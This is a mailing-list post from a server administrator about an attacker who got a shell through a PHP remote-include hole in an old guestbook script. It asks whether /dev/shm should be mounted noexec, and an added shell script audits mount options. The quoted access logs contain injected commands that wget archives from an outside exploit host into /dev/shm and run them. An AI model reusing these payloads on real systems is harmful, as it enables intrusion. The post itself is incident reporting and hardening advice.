Hello,

One of the servers I'm co-administering just got attacked a few days ago. The cracker managed to start a shell on the server by using one of these php-nuke-like include holes lying in old PHP scripts.

Until now it failed because most of these scripts were working with /tmp, and the /tmp on that server was mounted with noexec+nosuid. But this time /dev/shm was used: is this "new" filesystem really necessary, and what for? Would you keep it, or rather shut it down completely?

At least I'd like to have it also mounted in nosuid/noexec mode... I'll check in the boot scripts how to do that, but in the meantime, if you have suggestions, you're welcome :)

Webserver logs when the attack occurred (the aleks-exploits pages still seem to be active: you can get some interesting files from there, like exploits against the Linux kernel, IRC bots, and other "goodies"):

212.110.91.36 - - [30/Oct/2004:18:03:29 +0200] "GET /guestbook/include/livre_include.php?no_connect=lol&chem_absolu=http://www.aleks-exploits.com/own.txt?&cmd=cd%20/dev/shm;wget%20www.aleks-exploits.com/amech.tgz;tar%20zxvf%20amech.tgz;cd%20.amech;./sh HTTP/1.1" 200 3189 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"

212.110.91.36 - - [30/Oct/2004:18:03:49 +0200] "GET /guestbook/include/livre_include.php?no_connect=lol&chem_absolu=http://www.aleks-exploits.com/own.txt?&cmd=cd%20/dev/shm;wget%20www.aleks-exploits.com/a.tgz;tar%20zxvf%20a.tgz;./a HTTP/1.1" 200 2894 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"

Regards,
Olivier
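An added example, not part of the original message: a shell check for the gap described above, where /tmp was mounted noexec+nosuid but /dev/shm was not. The function name audit_mounts and the sample mount table are constructed for illustration; the input format is that of /proc/mounts.

```shell
#!/bin/sh
# Added example; audit_mounts is a hypothetical helper name.
# Reports directories whose filesystem lacks noexec, nosuid or nodev.
# Usage: audit_mounts [mounts-file] [dir ...]
audit_mounts() {
    mounts_file=${1:-/proc/mounts}
    if [ $# -gt 0 ]; then shift; fi
    if [ $# -eq 0 ]; then set -- /tmp /var/tmp /dev/shm; fi
    for dir in "$@"; do
        awk -v dir="$dir" '
            {
                mp = $2
                # A mount covers dir if it is dir itself or a parent of it.
                covers = (mp == dir) || (mp == "/") || (index(dir, mp "/") == 1)
                # Longest covering mount point wins; on a tie the later
                # line wins because it was mounted on top.
                if (covers && length(mp) >= length(best)) {
                    best = mp; opts = $4; found = 1
                }
            }
            END {
                if (!found) { print dir ": no covering mount found"; exit }
                missing = ""
                n = split("noexec nosuid nodev", want, " ")
                for (i = 1; i <= n; i++)
                    if (("," opts ",") !~ ("," want[i] ","))
                        missing = missing (missing == "" ? "" : ",") want[i]
                if (missing != "")
                    print dir ": on " best " missing " missing
            }' "$mounts_file"
    done
}

# Constructed mount table: /tmp hardened, /dev/shm and / left at defaults.
sample=$(mktemp)
cat > "$sample" <<'EOF'
/dev/root / ext3 rw 0 0
tmpfs /tmp tmpfs rw,nosuid,nodev,noexec 0 0
tmpfs /dev/shm tmpfs rw 0 0
EOF
audit_mounts "$sample"
rm -f "$sample"

# Fix for the running system:
#   mount -o remount,noexec,nosuid,nodev /dev/shm
# Persistent fix, as an /etc/fstab line:
#   tmpfs /dev/shm tmpfs defaults,noexec,nosuid,nodev 0 0
```

noexec blocks direct execution such as the `./sh` and `./a` calls in the logged requests, but not a script handed to an interpreter, so it limits the damage without closing the include hole itself.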